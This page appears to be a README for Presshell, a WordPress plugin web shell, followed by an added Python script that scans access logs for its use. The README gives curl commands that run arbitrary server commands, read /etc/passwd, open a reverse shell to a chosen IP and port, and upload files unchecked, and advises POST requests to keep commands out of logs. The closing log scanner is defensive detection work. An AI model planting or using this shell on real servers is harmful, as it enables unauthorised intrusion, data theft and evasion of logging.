Presshell : Quick And Dirty WordPress Command Execution Shell

Presshell is a quick and dirty WordPress command execution shell. It lets you execute shell commands on your WordPress server. The uploaded shell will probably be at <your-host>/wp-content/plugins/shell/shell.php

Installation

Installing the shell assumes you have administrative rights to WordPress and can install plugins, since transferring a PHP file to the media library shouldn’t work anyway. Otherwise, you have a bigger problem.

Simply upload the zip file located in the Releases section as a new extension and you’re good to go.

Usage

Using the shell is straightforward. Simply pass sh commands as an argument to the shell:

❯ curl 'http://host/…/shell.php?cmd=uname+-a'
Linux wordpress-server 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux

You may as well pass these arguments in a POST request, which is the recommended way to keep your commands out of logs.

❯ curl 'http://host/…/shell.php' --data-urlencode 'cmd=ls'
LICENSE
README.md
shell.php

More complex commands are also supported, but be careful with your quoting:

❯ curl 'http://host/…/shell.php' --data-urlencode 'cmd=cat /etc/passwd | grep -Ev "(false|nologin)"'
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync

❯ curl 'http://host/…/shell.php' --data-urlencode 'cmd=python -c "from urllib.parse import urlencode; print(urlencode({\"cmd\": \"uname -a\"}))"'
cmd=uname+-a

You can also open a reverse shell using the ip and port parameters. The default port is 443.

❯ curl 'http://host/…/shell.php' --data-urlencode 'ip=127.0.0.1'

❯ curl 'http://host/…/shell.php' --data-urlencode 'ip=127.0.0.1' --data-urlencode 'port=1337'

There is also an option provided for convenience to upload a file to the directory of the plugin unconditionally and without checks.

❯ curl 'http://host/…/shell.php' -F 'file=@some_file'
❯ curl 'http://host/…/shell.php' --data-urlencode 'cmd=ls'
LICENSE
README.md
shell.php
some_file
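
For defenders, an added example that is not part of Presshell or the original post: the GET form shown above leaves cmd= in the web server access log, while the POST form leaves only the method, path and status. This Python script flags both cases in Combined Log Format lines; the sample log lines and the function names are constructed for illustration, and the parameter names are the ones used on this page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# A PHP file requested directly inside a plugin directory.
PLUGIN_PHP = re.compile(r'^/wp-content/plugins/[^/]+/(?:[^/]+/)*[^/]+\.php$', re.I)
# Parameter names taken from the usage shown on this page.
SHELL_PARAMS = {"cmd", "ip", "port"}

def classify(line):
    """Return (severity, reason) for a suspicious log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _ts, method, target, status = m.groups()
    url = urlsplit(target)
    if not PLUGIN_PHP.match(url.path):
        return None
    hits = SHELL_PARAMS & set(parse_qs(url.query, keep_blank_values=True))
    if hits:
        return ("high", f"{client} {method} {url.path} params={sorted(hits)}")
    if method == "POST" and status.startswith("2"):
        # POST bodies are not written to the access log, so the command is
        # invisible here; the method, path and status are still recorded.
        return ("review", f"{client} POST {url.path} status={status}")
    return None

def scan(lines):
    """Classify every line and keep only the flagged ones."""
    return [r for r in map(classify, lines) if r]

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '203.0.113.7 - - [16/Dec/2024:10:00:01 +0000] "GET /wp-content/plugins/shell/shell.php?cmd=uname+-a HTTP/1.1" 200 98 "-" "curl/8.5.0"',
    '203.0.113.7 - - [16/Dec/2024:10:00:09 +0000] "POST /wp-content/plugins/shell/shell.php HTTP/1.1" 200 31 "-" "curl/8.5.0"',
    '198.51.100.4 - - [16/Dec/2024:10:01:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [16/Dec/2024:10:01:05 +0000] "GET /wp-content/plugins/akismet/akismet.php HTTP/1.1" 403 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for severity, reason in scan(SAMPLE):
        print(severity, reason)
```

Some legitimate plugins accept direct POSTs to their own PHP files, so "review" hits need to be compared against the list of installed plugins before escalation.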

R K
